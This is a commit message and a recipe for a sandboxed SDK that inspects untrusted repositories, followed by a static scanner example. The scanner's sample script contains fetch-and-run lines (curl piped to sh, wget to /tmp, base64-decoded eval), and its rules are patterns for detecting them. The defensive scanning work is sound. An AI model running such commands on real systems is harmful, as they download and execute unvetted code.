Turn the stable workspace surface into five documented, runnable stories with a shared guest-backed smoke runner, new docs/use-cases recipes, and Make targets for cold-start validation, repro/fix loops, parallel workspaces, untrusted inspection, and review/eval workflows. Bump the package and catalog surface to 3.6.0, update the main docs to point users from the stable workspace walkthrough into the recipe index and smoke packs, and mark the 3.6.0 roadmap milestone done. Fix a regression uncovered by the real parallel-workspaces smoke: workspace_file_read must not bump last_activity_at. Verified with uv lock, UV_CACHE_DIR=.uv-cache make check, UV_CACHE_DIR=.uv-cache make dist-check, and USE_CASE_ENVIRONMENT=debian:12 UV_CACHE_DIR=.uv-cache make smoke-use-cases.
34 lines
1,021 B
Markdown
# Unsafe Or Untrusted Code Inspection

Recommended profile: `workspace-core`

Smoke target:

```bash
make smoke-untrusted-inspection
```

Use this flow when the agent needs to inspect suspicious code or an unfamiliar
repo without granting more capabilities than necessary.

Canonical SDK flow:

```python
from pyro_mcp import Pyro

pyro = Pyro()
# Seed a fresh workspace from the local copy of the suspicious repo.
created = pyro.create_workspace(environment="debian:12", seed_path="./suspicious-repo")
workspace_id = str(created["workspace_id"])

# Enumerate and read files explicitly; nothing from the repo is executed.
pyro.list_workspace_files(workspace_id, path="/workspace", recursive=True)
pyro.read_workspace_file(workspace_id, "suspicious.sh")
# Run one narrow check inside the workspace and write the report there.
pyro.exec_workspace(
    workspace_id,
    command="sh -lc \"grep -n 'curl' suspicious.sh > inspection-report.txt\"",
)
# Export only the report, then delete the workspace.
pyro.export_workspace(workspace_id, "inspection-report.txt", output_path="./inspection-report.txt")
pyro.delete_workspace(workspace_id)
```

This recipe stays offline-by-default, uses only explicit file reads and execs,
and exports only the inspection report the agent chose to materialize.
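
A broader static check than the single `grep -n 'curl'` step in the flow above, as an added example that is not part of the original recipe or of the pyro_mcp project: it reads a script as text, never executes it, and reports several patterns in `grep -n` style. The rule names, regular expressions and sample script are constructed assumptions.

```python
import re

# Constructed sample standing in for suspicious.sh; it is only read as text.
SAMPLE_SCRIPT = """#!/bin/sh
set -e
echo "installing helper"
curl -fsSL https://example.invalid/install.sh | sh
wget -q https://example.invalid/tool.tgz -O /tmp/tool.tgz
echo "ZWNobyBoaQ==" | base64 -d > /tmp/stage.sh
eval "$(cat /tmp/stage.sh)"
# curl is mentioned here only in a comment
"""

# Hypothetical rule set: (rule name, pattern) pairs worth a reviewer's attention.
RULES = [
    ("network-fetch", re.compile(r"\b(curl|wget)\b")),
    ("pipe-to-shell", re.compile(r"\|\s*(sudo\s+)?(ba|z|da)?sh\b")),
    ("encoded-payload", re.compile(r"\bbase64\s+(-d|--decode)\b")),
    ("dynamic-eval", re.compile(r"\beval\b")),
]


def inspect_script(text):
    """Return (line_number, rule_names, line) for each flagged non-comment line."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        code = line.strip()
        if not code or code.startswith("#"):
            continue  # unlike plain grep, skip blanks and full-line comments
        hits = [name for name, pattern in RULES if pattern.search(code)]
        if hits:
            findings.append((number, hits, code))
    return findings


def render_report(findings):
    """Format findings like `grep -n` output, with the matching rules prepended."""
    return "\n".join(f"{n}:[{','.join(rules)}] {line}" for n, rules, line in findings)


if __name__ == "__main__":
    print(render_report(inspect_script(SAMPLE_SCRIPT)))
```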